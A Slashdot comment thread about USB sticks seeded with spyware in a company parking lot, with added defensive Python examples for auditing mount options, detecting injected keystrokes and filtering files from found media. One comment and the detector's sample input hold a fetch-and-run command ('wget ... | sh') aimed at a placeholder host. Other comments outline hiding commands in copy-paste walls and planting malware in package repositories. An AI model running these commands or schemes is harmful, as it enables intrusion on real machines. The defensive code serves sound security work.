Criminals Distribute Infected USB Sticks In Parking Lot
New submitter sabri writes "The Dutch news-site Elsevier is reporting that cybercriminals attempted to steal data from a multinational chemicals company by 'losing' spyware-infected USB sticks in the company's parking lot. Their attempt failed as one of the employees who found the stick dropped it off at the company's IT department, who then found the spyware and issued a warning. So next time, don't expect to find someone's dirty pictures on a USB stick you just found..."
Sounds expensive just to distribute malware/viruses at, say, even a few bucks a stick compared to traditional methods like email, which has proven to be quite effective on the gullible. I just don't see this being common practice, though it's possible it could be a targeted attack in an attempt to penetrate the company specifically.
So you can load USB sticks you find and extract the pictures!
"Have you ever thought about just turning off the TV, sitting down with your kids, and hitting them?"
Or turn off auto-run in Windows. I once found a USB drive on the ground. Turns out it was some grad student's drive. I tried to return it but got no response from the email I found on his resume.
and laugh at the windows auto-loader files they tried to get you with.
Seriously, I found a "trick" USB stick in my work mailbox once, which turned out to be a test from our IT department that, if you loaded it (in Windows), would direct you to an obligatory computer security training program. After I called them about it, they let me keep it.
Why would you run an executable from a USB stick you found in a goddamn parking lot? Is this the same crowd who'd find a syringe and needle in the parking lot, and inject it in themselves just to see what happens?
Sometimes, people deserve what they get.
To plug an unknown into your computer in the first place? Good grief, there will never be a shortage of stupid.
dd if=/dev/zero of=/dev/[usbdrive]
voila, free thumb drive, malware free.
Seriously, how did this get past the fire-hose? This isn't a new idea, practice, or form of attack. It's actually many many years old (likely dating back to the days of floppy disks). Most company Security and/or IT policies state that you should bring found USB Drives to Security and/or IT, and expressly forbid just plugging them into a company computer on the company network. I have no idea how anyone at Slashdot would have found this remotely news-worthy.
This technique is discussed in "Metasploit: The Penetration Tester's Guide" ( http://shop.oreilly.com/product/9781593272883.do )
Excellent book by the way. After reading it, you'll never look at computer security the same way again, and may very well just switch to an Abacus with a box of crayons on top.
There are some people that if they don't know, you can't tell 'em.
How many times did this work and we DON'T hear about it, in cases where people did NOT take it to their IT department?
Actually, that's exactly what industrial spies should put on there if they were smart.
I would use a Linux live cd... No real threat of infection since it would probably target windows anyway. For added security, unplug the power to the hard drives.
This is a time-honored way of targeting a particular company. It sounds expensive, but if your motivation is commercial or governmental *coughcoughstux* it's extremely cheap compared to the alternatives (bribery, breaking-and-entering, rubber-hose cryptography). It's also a great way of finding out whether your own organization is aware of malware trouble; this technique is commonly used as part of security audits performed by companies hired to find out how good your company really is.
A company I worked for a few years ago hired a security auditing firm to check up on ourselves (only a few people were told, and we were told to keep quiet to ensure that our day-to-day practices were tested, not our "crap, someone's checking!" performance). They were unable to penetrate the network from the outside (including wirelessly) or socially engineer their way past reception or weasel out a password, but they got in via the USB-stick-in-the-parking-lot method. They told us afterwards that this is an extremely effective technique, as primate curiosity is almost unstoppable.
...if it's one of those shaped like red kissing lips, has a little piece of lingerie wrapped around it, a little bit of perfume, and does indeed have some dirty pictures on there (seemingly amateur pictures taken with a phone). Chances are a lot of colleagues will want to have a look to see if they "recognize somebody".
Idiots. Both of them.
So a coworker found a usb key in the parking lot and wisely didn't plug it in. Instead he asked me to check it out before he did. So dutifully I fired up my live CD, plugged it in and quickly saw it belonged to a coworker. But which one in a company of 300+? Well, that was actually pretty easy to figure out, since there was a nice folder with pictures of himself naked in a mirror. Many of them. All alone. So I gave the guy the USB key, told him what I'd seen, washed my hands (and disinfected my cubicle) and was sooooo glad when the photographer took a different job.
So there may be a virus, or maybe just a lonely coworker.
Wouldn't it be more productive to give them away? As in, brand them with the name of a product and literally give them away at a place the employees visit. I think someone would be much more likely to use a USB stick given to them at a "legitimate" event than one found on the ground.
Don't forget to AVOID USING "-t vfat" as an option to mkfs, or else you MAY be able to use it SOMEWHERE BESIDES Linux.
There, fixed that for you
I didn't know Yoda changed his name to Anne and was writing news articles these days.
dude you are fuckin' boring !
If you think Linux has a magical immunity you might want to read "how to write a Linux virus in 5 easy steps", which shows that with just a little social engineering it's really not hard to target Linux, just as the malware writers target Windows and OS X now.
From the article you mention:
A step that could be taken by the Gnome and KDE developers: Require launchers to have execute permissions. A saved attachment won't have those. Therefore, even though a syntactically correct and properly named launcher was dropped on the desktop a user can't just click on it and start it if the execute bit is not set.
Done. Modern versions of KDE need launchers to have execute permission. That hole is patched.
And nobody pretends that Linux has some magical immunity to viruses. As a Unix-like OS it just follows a few key principles:
- don't blindly execute everything. Require executables to be explicitly marked as such (thus any shit downloaded from the web or from e-mail won't automatically be launchable).
- don't run constantly as root. thus the amount of harm that a program can do is limited to the access rights of a user. (While this still makes it possible to send spam, mine the data of the user, and modify the user profile, at least it prevents further deeper compromising of the running system).
That doesn't magically solve all malware problems in the universe. But at least it makes the life of malware writer a little bit more complicated. And the 5-step virus relies on a work-around of the first rule. Which has been since then corrected.
Back then, these no-brainer principles were NOT followed by Windows XP, making it even easier to write worms spreading over e-mail. Thankfully, since then Vista has arrived and has brought UAC dialogs in these situations (now how much dialogs can help security problems when users are used to clicking "okay" on everything, that remains to be seen).
Or did you think android runs on Windows?
Android is a completely different beast and instead of a Unix-like userland it uses its very own userland (a Java-like system).
Though it too doesn't allow execution of arbitrary e-mail attachments. It's not impossible to write Android malware, even malware that finds a way to look legitimate to Android's capability system.
But at least the scenario "Here are some pics of hot lesbian teens! Click on the attachment to view them!" doesn't work on modern OSes. Except Windows (and that's until WinXP; starting from Vista, you get a UAC dialog telling you that you're running an executable from an untrusted source - now how many idiots will click on "okay" anyway is a different story).
Didn't occur to you to go to his house, pick the locks, and leave the drive on his night stand? Because that would have been AWESOME!
Any security-minded organization would indoctrinate their employees, and set policy (either via OS security and/or SOP) to use only secured USB keys, which are provided. This should be a no-brainer, and shouldn't cost a significant amount.
This kind of policy limits the scope of these kinds of attacks, as well as helping to prevent inadvertent info-leaks like when workers lose their wallet/backpack. By preventing stupidity and bad luck you greatly improve the company's security.
Social engineering at its finest and simplest. Much more effective at getting your payload onto a system using this method than, say, using a dancing baby gif.
The trouble with USB is that you don't know. Let's say you plug in that "thumb drive". Perhaps it turns out to be a "keyboard" that issues whatever the shortcut is for executing a command and sends something like:
wget -q -O - http://naughty.com/ | sh
All sorts of things could happen when you plug in a USB stick. Perhaps not too much of a worry in practice for Joe Schmo as doing it effectively would probably require a level of sophistication that would make it not worth while for a vague target but Linux does not magically make USB sticks safe.
The autorun feature of Windows (mainly XP and to a much lesser extent Vista/7) is a textbook example of where trading convenience for security can turn out to be a VERY BAD IDEA.
Autorun functionality pisses me off anyway. I always turn that shit off mainly because yes, if I put in a DVD or a USB flash it's likely I'm going to be wanting to use it soon, but since Autorun is going to invariably pop up some Explorer window or DVD application all of a sudden once the media has been analysed, that very action of a new window popping up without my direct instantiation of it is damn annoying.
Saving the couple of clicks to perform the same effect of whatever Autorun does is really, really not worth the mess we've gotten ourselves into (and still do).
Most people on Slashdot are fucking idiots.
The 'cyber criminals planted the usb sticks in an attempt to steal data'... stuff doesn't come from investigation, it comes from speculation. It could simply have been an infected USB stick an employee threw away or dropped.
DSM is really a boring chemicals business, employing tens of thousands of people. The chances of spyware getting past anti virus software and onto the right persons computer is pretty damn slim.
So it looks more like projection to me. There's a lot of talk about cybercriminals as part of the 'cyberwar' budget requests. This was a lost, infected USB key. The IT dept projects the cyberwar onto their company and assumes it was a cyberattack and not some piece of crapware. The cyberwar lobby grabs the story and pumps it up for their own agenda.
I found a RAM stick once in a parking lot, I plugged it in and found nothing, or so I thought, a directory listing was empty and an anti-virus scan returned a clean bill of health. A few days later my friend told me that he was receiving emails from me. After investigation it was determined that a Linux on windows was running, with a SMTP server and a mail client was sending many emails. Is that possible? I asked about the reason for the SMTP server, I was told it was in case my ISP was blocking or throttling SMTP traffic through their server.
+ dns poisoning
+ arp poisoning
+ infected windows box on same LAN
+ back doored router (google: cisco routers back doors spooks law enforcement - for an example of one company)
+ compromised BIOS and/or PCI/AGP hardware devices which survive wipes
the rootkit scanners (rkhunter, chkrootkit, and a few others) for Linux flat out SUCK. If you google for linux shells, back doors, etc. there are many, and many can be exploited through a 0day application exploit and by other means. The more packages on your system, the more possible holes to slide in through.
chkrootkit has an option to show you the 'strings' of binaries. While this is useful, it is useless to the majority of Linux newbies who know nothing about reverse engineering and determining what 'strings' may be good or may be bad. When they raise this point on the net, people reply with messages like "Just download from signed repos", "Verify the check-sum", and other advice which is good, but against an APT threat a system may be targeted in many ways and held in a persistent poisoned state (have you read about RF attacks? packet radio drivers and your ethernet card and/or sound card (sound modem); the attacks are infinite). Even attacks using image formats with modified data can factor in and exploit your system.
the hardware attacks get even worse, even when it comes to splice attacks on wired networks (for those who know wireless/bluetooth is for dumbshits and use a wired network).
keypresses (passwords!) can be yanked from next door or apartment/condo rooms around you even if you use wired keyboards. keypresses can be yanked via power line analysis and smart meters may make this even easier!
traffic analysis (predictive behavior) in order to poison the right way the right time even through encryption.
nothing is secure, not even an unplugged, never networked locally or remote system. satellite attacks should also be factored in.
tin foil? only if you're an idiot or one of THEM.
Plug in, dd with zeros, fdisk, mkfs.ext2, profit?
Unless you are on windows where you plug in and automatically get infected...
Just because you issue a warning doesn't mean your end users will heed it. I've learned that all too well in regard to WhitePages. We tell our employees to not use it, yet they do so anyways. Then they bitch when we're replacing their systems due to a rogue AV suite. So even if IT issues a general warning to not plug in the drive... some brain dead end user will do so anyways. It only takes one.
Are they free? Mail me one!
I collect viruses,
"ViRuS PaRK"
The company should have disabled USB ports on all company computers anyway. Inconvenient, yes, but necessary in this day and age.
Doesn't address the newly popular (due to continuing stupid expense reductions) of BYOD where of course USB ports will remain open, but as BYOD is a security nightmare anyway...
This is so old and has happened so many times before that some organisations have had time to develop, test and deploy so-called "data gateways" - machines that you can put your USB sticks, DVDs and other media into, that will scan them for infection and safely transfer the files you select to your network share.
That's why operating system kernels that are written by clueful coders validate DMA commands from target Firewire devices.
I've done a whole lot of Firewire storage firmware, mostly for Wiebetech. The way Firewire drives work is that the Initiator - your PC - transmits SCSI Command Descriptor Blocks - CDBs - to the Target - the disk - via the Serial Bus Protocol 2 - SBP-2. (There was an SBP protocol at first but it was withdrawn for some reason).
After that the Initiator sits quietly by until the Target informs the initiator that the CDB has been processed.
I think they designed it this way in part because Targets have limited processing capacity, so allowing the Target to drive the protocol also allows it to control the rate at which work is performed. But you're also trusting your Target to deliver the file the user just double-clicked, rather than overwriting the buffer cache entries that contain /etc/shadow.
One of the very best hacks ever at the MacHack conference was that some guy wrote a FireWire application that would display an animation of a fire burning in a brick fireplace on the screen of any other Macintosh it was connected to.
The Mac whose screen would show that heart-warming image did not have any extra software installed on it at all. Instead the Mac with the Hack installed would DMA it directly into the other Mac's video memory!
Michael David Crawford, who is available for storage, embedded systems and driver consulting.
A bulk purchase of low capacity but nice looking keydrives could easily be less than $1 a pop... for that sort of money I could see a mass (snail)mailing of malware being quite feasible...
Targeted advertising data could be used to select young, affluent, non-technical types, perhaps package the drive as a free trial version of a music/movie download service, even have a slick looking website with the 'viewing' software there as a free download.
I wonder how many time they succeeded silently before they got busted and stopped because (nobody laugh) a "warning" was issued.
And the Security Kabuki goes on.
I find it odd: the amount of mental gymnastics you go through to prove linux to be better.
We're not speaking about malware-on-a-stick as reported by TFA.
I'm just answering the current thread of discussion, in which the conversation has drifted toward the usual debate of Unix-like OSes vs. Windows regarding design and security.
(in short: all modern (=anything dating back from Unix) OSes (except Windows) are reputed to be slightly more secure due to their design: namely they don't run thing which aren't tagged as being runnable in the first place, they don't run with admin privilege. This doesn't solve all problems, but at least makes these systems less likely to be target of the "Click on attachment to see nude pictures!" type of malware.
Parent poster pointed back to a 3 year old article trying to prove that it's possible to build such type of malware.
I did just explain that this article is built around an oversight in the desktop environment which has since been fixed in the affected systems, so the initial claim, "sane OS design = less susceptible to clickable malware in attachment", still applies)
In short, in the last few post we were speaking about a different type of malware than the one of TFA.
In case of a rogue USB stick, the virus wouldn't be downloaded. It would already be on a fs with execute bit set.
Well, for that to work, it would require that the FS *has* an execute bit to set.
The usual filesystem found on USB sticks (FAT) doesn't have one. Nor do the other typical choices found on removable media (exFAT, NTFS, UDF).
And I have to check, but it's quite possible that hot-plugged devices aren't mounted with the "exec" attribute but with the "noexec" attribute. (My distro does indeed do so.) Thus filesystems which aren't declared in the fstab aren't trusted enough by default to run anything.
So, in order to have a working USB stick as a malware carrier, one needs:
- to format with an unusual format (ext, btrfs, etc. Or using a layer above FAT & UDF like TRANS.TBL)
- to set the execute (and maybe the suid or dev, might be useful depending on what they want to snoop/steal) bits on the file system
- either hope that the hot-plug service isn't configured to use the "noexec,nosuid,nodev" combo by default.
- or find a way around that:
-- like storing the hack inside a .ZIP file (or more likely a .tar file, to get the mode-bits packed with it)
-- along with instructions not to double click on it (which will open the TAR with the desktop environment VFS plugin - no executable at all here), but instead to drag-drop the content of the TAR to your home before opening it (where the execute bit will be honored*)
-- hope that the guy will open the pictures by clicking on them (and won't instead use some "slide-show" command by right-clicking the directory)
At that point of complexity, it's easier to go the "Smartphone malware" route, and play by the Linux book:
- design a closed source application.
- with some interesting feature (MP3 Youtube downloader!!!)
- hide your malware payload inside the package
- submit your package to some closed source repository which doesn't check that closely the details of submitted applications.
- if the repository is popular enough, people will start downloading the software and installing it.
Now all the dirty complicated parts (making sure that the correct stuff is marked as executable, etc.) are automatically handled by the package manager (as it should be on any modern Linux distro).
"all" you need is "just" some social engineering:
- to convince the repository manager to include your package (easier with smaller less known repositories).
- to convince the end user to notice your 3rd party application, add the repository and install your malware. (easier with big known 3rd party repositories).
*: That's the only situation where the security model of Windows (version >= Vista) is slightly
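One caveat to the "FAT has no execute bit" argument in the post above: the filesystem has no mode bits, but the Linux vfat driver synthesises them at mount time, and unless fmask or showexec say otherwise every file on a FAT stick shows up as executable. So the mount options are what actually decide whether a found stick can run anything. The following is an added example, not code from the thread: it parses /proc/mounts text and reports every mount under the usual removable-media paths that is still missing one of noexec, nosuid or nodev. The sample /proc/mounts content is constructed, and the prefixes (/media, /run/media, /mnt) are an assumption about where the audited host auto-mounts.

```python
"""Audit hot-plug mounts for the noexec,nosuid,nodev combination (added example)."""
import re
import shlex
from dataclasses import dataclass

HARDENING = frozenset({"noexec", "nosuid", "nodev"})
REMOVABLE_PREFIXES = ("/media/", "/run/media/", "/mnt/")   # assumption: udisks + manual mounts
# Filesystems that store real Unix mode bits: an ext4 stick can carry +x, setuid and device nodes.
MODE_BIT_FS = {"ext2", "ext3", "ext4", "btrfs", "xfs", "f2fs"}
FAT_FS = {"vfat", "msdos", "exfat"}

@dataclass
class Mount:
    device: str
    mountpoint: str
    fstype: str
    options: frozenset

@dataclass
class Finding:
    mountpoint: str
    fstype: str
    missing: tuple
    note: str

def _unescape(field):
    """/proc/mounts writes space, tab, newline and backslash as \\ooo octal escapes."""
    return re.sub(r"\\([0-7]{3})", lambda m: chr(int(m.group(1), 8)), field)

def parse_proc_mounts(text):
    """Parse lines of the form: device mountpoint fstype options dump pass."""
    mounts = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 4:
            continue
        dev, mp, fstype, opts = (_unescape(p) for p in parts[:4])
        mounts.append(Mount(dev, mp, fstype, frozenset(opts.split(","))))
    return mounts

def audit_removable_mounts(text, prefixes=REMOVABLE_PREFIXES):
    """Return one Finding per removable mount that lacks any of the hardening options."""
    findings = []
    for m in parse_proc_mounts(text):
        if not m.mountpoint.startswith(prefixes):
            continue
        missing = tuple(sorted(HARDENING - m.options))
        if not missing:
            continue
        if m.fstype in MODE_BIT_FS:
            note = "filesystem carries real mode bits: +x/setuid/device nodes on the stick are honoured"
        elif m.fstype in FAT_FS:
            note = "FAT has no exec bit but the driver synthesises one (fmask/showexec), so noexec still matters"
        else:
            note = "check how this driver maps permissions"
        findings.append(Finding(m.mountpoint, m.fstype, missing, note))
    return findings

def remount_hardened(mountpoint):
    """Shell command that adds the three options in place, without unmounting."""
    return "mount -o remount,noexec,nosuid,nodev " + shlex.quote(mountpoint)

# Constructed sample: a hardened root, a FAT stick with nosuid,nodev only, an ext4 stick
# with no hardening at all, and an ext4 stick that is fully hardened.
SAMPLE_PROC_MOUNTS = """\
/dev/sda1 / ext4 rw,relatime,errors=remount-ro 0 0
/dev/sdb1 /run/media/alice/LOST\\040STICK vfat rw,nosuid,nodev,relatime,fmask=0022,dmask=0022,uid=1000,gid=1000,showexec,utf8=1,flush 0 0
/dev/sdc1 /media/bob/ext4stick ext4 rw,relatime 0 0
/dev/sdd1 /media/bob/hardened ext4 rw,nosuid,nodev,noexec,relatime 0 0
"""

if __name__ == "__main__":
    for f in audit_removable_mounts(SAMPLE_PROC_MOUNTS):
        print(f"{f.mountpoint} ({f.fstype}): missing {','.join(f.missing)}; {f.note}")
        print("  fix:", remount_hardened(f.mountpoint))
```

On a live box, feed it `open("/proc/mounts").read()` instead of the sample. Note that noexec on the mount only stops the loader; a user can still `sh ./script` or `python ./file.py` from a noexec mount, so it raises the bar rather than closing the hole.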
- Set-up a wiki somewhere.
- Create a page with a tasty title
(How to rip lesbian porn videos from flash powered site!!!!)
- Hide command in a big wall of commands that have to be copy-pasted to a shell.
- With some clever page formatting, make it so that the line seems invisible when displayed in a web browser, but still gets copied when the big wall of commands is selected, copied and pasted into a shell. (You know, like this old trick where the user is asked to copy-paste a password into a web form. But the input field is actually a "file input" field in the web form, the password is actually a much longer string (the full path of an important file to steal) but only a few letters are visible, the rest is invisible due to weird formatting, and the form is autosubmitted by javascript).
Clueless users will execute your script en masse.
1) Penetration testers have been using this attack for some time, surprisingly often it works, it only takes one clueless manager to plug it in.
2) With a little creative reengineering one does not need to rely on the system to automount and autorun the stick, instead one sticks a USB hub in there and a HID emulator and pumps out keystrokes, pretty much all operating systems will automatically initialize it as a keyboard device. Also one can hide that function until go time. let them act as ordinary memory sticks 'till then.
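The "stick that is really a keyboard" described in point 2 above, and in the earlier comment about a drive that types `wget ... | sh`, defeats every defence that looks at the filesystem, because there is no filesystem. The usual control is a device allowlist (which USB HID devices may enumerate at all); a complementary detection is to look at how the new "keyboard" types. The block below is an added example, not from the thread: a heuristic that flags a keystroke burst typed faster and more regularly than a human can manage, or containing a download-and-execute command. The key events are constructed (timestamp in seconds, character), the thresholds are assumptions rather than measured values, and in practice the events would come from an evdev or keyboard-hook reader.

```python
"""Heuristic detection of injected keystrokes from a USB HID emulator (added example)."""
import re
from dataclasses import dataclass, field
from statistics import pstdev

@dataclass
class Verdict:
    suspicious: bool
    chars_per_second: float
    jitter_ms: float
    reasons: list = field(default_factory=list)

# Shapes of commands a HID payload typically types into a shell or Run dialog (assumption).
SHELL_MARKERS = re.compile(
    r"(wget|curl)\b.*\|\s*(sh|bash)\b|powershell(\.exe)?\s+-|cmd(\.exe)?\s+/c", re.I)

def analyse_keystrokes(events, max_human_cps=12.0, min_human_jitter_ms=15.0):
    """events: list of (timestamp_seconds, char). Two or more indicators => suspicious."""
    if len(events) < 8:
        return Verdict(False, 0.0, 0.0, ["too few events to judge"])
    times = [t for t, _ in events]
    text = "".join(c for _, c in events)
    gaps_ms = [(b - a) * 1000.0 for a, b in zip(times, times[1:])]
    duration = times[-1] - times[0]
    cps = (len(events) - 1) / duration if duration > 0 else float("inf")
    jitter = pstdev(gaps_ms)        # a human's inter-key timing varies; a script's does not
    reasons = []
    if cps > max_human_cps:
        reasons.append(f"{cps:.0f} chars/s exceeds a human typing rate")
    if jitter < min_human_jitter_ms:
        reasons.append(f"inter-key jitter {jitter:.1f} ms is machine-regular")
    if SHELL_MARKERS.search(text):
        reasons.append("burst contains a download-and-execute command")
    return Verdict(len(reasons) >= 2, cps, jitter, reasons)

def make_burst(text, gaps_ms):
    """Turn a string plus per-key delays (ms) into timestamped key events (constructed input)."""
    t, events = 0.0, []
    for ch, gap in zip(text, gaps_ms):
        events.append((t, ch))
        t += gap / 1000.0
    return events

# Constructed samples: the command from the earlier comment typed at 2 ms per key,
# and a human typing a harmless command with uneven delays.
INJECTED_CMD = "wget -q -O - http://naughty.com/ | sh\n"
INJECTED = make_burst(INJECTED_CMD, [2.0] * len(INJECTED_CMD))
HUMAN_TEXT = "ls -la documents"
HUMAN_GAPS = [120, 95, 210, 80, 150, 300, 110, 70]
HUMAN = make_burst(HUMAN_TEXT, [HUMAN_GAPS[i % len(HUMAN_GAPS)] for i in range(len(HUMAN_TEXT))])

if __name__ == "__main__":
    for label, burst in (("injected", INJECTED), ("human", HUMAN)):
        v = analyse_keystrokes(burst)
        print(f"{label}: suspicious={v.suspicious} cps={v.chars_per_second:.1f} "
              f"jitter={v.jitter_ms:.1f}ms reasons={v.reasons}")
```

Two indicators are required before flagging so that a fast typist or a pasted command alone does not trip it; the thresholds would need tuning against real keyboard data before being used to block input.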
And I thought the anthrax scare was back... Oh, well, read on.
1. Don't, under any circumstances, mount it
2. Format it
3. Enjoy your new USB stick
If a given computer had a card-reader whose hardware or immutable firmware guaranteed read-only behavior when the lock tab was set, that would meet the r/o requirements as well, but only with respect to this particular computer and other computers with the same feature.
It would basically be the same situation floppy disks were always in: Most 1980s floppy drives enforced the read-only tab in hardware, the host computer couldn't override it. But it was possible to build or modify a floppy drive so the read-only tab was ignored.
As a customer, I would PREFER a computer where any writeable long-term-memory had a physical way of locking it into read-only mode that could not be defeated in software. This could be a jumper setting, a lock/unlock tab, a push-button, or whatever. "long-term-memory" included hard drives, writable USB/firewire/etc. devices, SATA and IDE devices, and even the computer BIOS code and that part of the BIOS data that doesn't need to change all the time (i.e. the clock and certain other status bits would not be protected from change). Those last two I would keep "read-only" 24/7 except when I was making changes.
Except they used CDs to infect people's computers.
Reading, parsing and displaying some information like icons from the connected drive can be exploited too. This shouldn't be news to anyone following security trends and having read about Stuxnet, for example.
There are many things that still just happen automatically once you plug in removable drive to windows systems. Unfortunately it's also true that macs have similar weaknesses and more and more linux distros too as they try to make systems more 'user friendly' .
I got you beat. Years ago we used a build of Windows NT that didn't recognize USB ports. Security problem solved. (yes we had the ports, we just couldn't use them. I recall having to install a SCSI card just so I could use a scanner... good times.)
Of course criminals could just leave some 3.5" floppies lying around in the parking lot... not quite the sexy draw I would bet...
I went down to the employment office to get some assistance finding work. There I used a USB stick to record some stuff off one of their PCs. When I came home and looked at the USB on my Linux box I found a . (dot) hidden directory I did not create. I searched online and found the files within were related to a PC virus. I emailed the office and told them exactly how I got the virus. A week later I went to the office again and used a different PC. I popped the USB into my Linux laptop and there it was again. I went to the secretary and told them this was unacceptable and that they were propagating viruses to their clients.
I also dislike operating systems that randomly add . (dot) hidden directories to my USB. For example Apple products seem to do this. I think they add files in order to improve access to the contents or add images or something. Every time I stick my USB stick into someone's Mac, I have to go through the directories it made automatically to verify that it didn't insert some malicious code.
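The "data gateway" mentioned earlier in the thread and the stray hidden directories in the two comments just above are two sides of the same job: decide, file by file, what is allowed off a found stick. The block below is an added example, not code from the thread or from any product: it walks a mounted stick, refuses anything that can execute or that a host parses on its own (autorun.inf, .lnk, scripts), refuses hidden dot entries (the .Trashes, .Spotlight-V100 and ._AppleDouble droppings macOS leaves, or the hidden directory the commenter found), checks that each allowed file really starts with the bytes its extension implies, and copies only the survivors to a destination with a SHA-256 manifest. The allowlist, magic bytes and the sample stick are constructed for the demonstration; a real gateway would also run an AV engine over the survivors.

```python
"""Minimal removable-media gateway: allowlist, magic check, hash manifest (added example)."""
import hashlib
import shutil
import tempfile
from pathlib import Path

# Allowed extensions and the leading bytes a file of that type must start with (constructed list).
ALLOWED_MAGIC = {
    ".pdf": (b"%PDF",),
    ".png": (b"\x89PNG",),
    ".jpg": (b"\xff\xd8\xff",), ".jpeg": (b"\xff\xd8\xff",),
    ".docx": (b"PK\x03\x04",), ".xlsx": (b"PK\x03\x04",),
    ".txt": (), ".csv": (),          # plain text: validated by UTF-8 decoding instead
}
AUTO_PARSED = {"autorun.inf", "desktop.ini"}             # read by Explorer without a click
EXEC_EXT = {".exe", ".scr", ".com", ".bat", ".cmd", ".vbs", ".js", ".jse",
            ".ps1", ".lnk", ".dll", ".msi", ".jar", ".sh"}

def classify(path: Path, root: Path):
    """Return (verdict, reason) for one file found on the stick."""
    rel = path.relative_to(root)
    if any(part.startswith(".") for part in rel.parts):
        return "blocked", "hidden entry (dotfile or dotdir, e.g. .Trashes, ._AppleDouble)"
    name, ext = path.name.lower(), path.suffix.lower()
    if name in AUTO_PARSED:
        return "blocked", "auto-parsed by a host OS"
    if ext in EXEC_EXT:
        return "blocked", "executable or shortcut"
    if ext not in ALLOWED_MAGIC:
        return "blocked", "extension not on the allowlist"
    data = path.read_bytes()
    magics = ALLOWED_MAGIC[ext]
    if magics and not any(data.startswith(m) for m in magics):
        return "blocked", "content does not match extension"
    if not magics:
        try:
            data.decode("utf-8")
        except UnicodeDecodeError:
            return "blocked", "text file is not valid UTF-8"
    return "allowed", "passed checks"

def gateway_transfer(root, dest):
    """Scan every file under root; copy allowed ones to dest. Returns (manifest, blocked)."""
    root, dest = Path(root), Path(dest)
    manifest, blocked = {}, {}
    for path in sorted(p for p in root.rglob("*") if p.is_file()):
        verdict, reason = classify(path, root)
        rel = path.relative_to(root).as_posix()
        if verdict == "blocked":
            blocked[rel] = reason
            continue
        target = dest / rel
        target.parent.mkdir(parents=True, exist_ok=True)
        shutil.copyfile(path, target)     # copyfile copies data only, never mode bits
        manifest[rel] = hashlib.sha256(path.read_bytes()).hexdigest()
    return manifest, blocked

def build_sample_stick(root):
    """Constructed stick contents: what a 'found in the parking lot' drive might hold."""
    root = Path(root)
    files = {
        "autorun.inf": b"[autorun]\nopen=pics.exe\n",
        "pics.exe": b"MZ\x90\x00fake",
        "holiday.jpg": b"\xff\xd8\xff\xe0 jpeg data",
        "invoice.pdf": b"MZ\x90\x00 not really a pdf",     # executable wearing a .pdf name
        "notes.txt": b"meeting at 3\n",
        "report.lnk": b"L\x00\x00\x00",
        ".Trashes/old.doc": b"junk",
        "._holiday.jpg": b"\x00\x05\x16\x07",
    }
    for rel, data in files.items():
        p = root / rel
        p.parent.mkdir(parents=True, exist_ok=True)
        p.write_bytes(data)
    return root

def demo():
    """Build the sample stick in a temp dir, run it through the gateway, return the outcome."""
    with tempfile.TemporaryDirectory() as src, tempfile.TemporaryDirectory() as dst:
        build_sample_stick(src)
        manifest, blocked = gateway_transfer(src, dst)
        return sorted(manifest), blocked

if __name__ == "__main__":
    allowed, blocked = demo()
    print("copied:", allowed)
    for rel, why in blocked.items():
        print(f"blocked {rel}: {why}")
```

Point `gateway_transfer` at the mount point of the stick and at a network share to use it as described; the manifest gives the receiving side something to verify against after the copy.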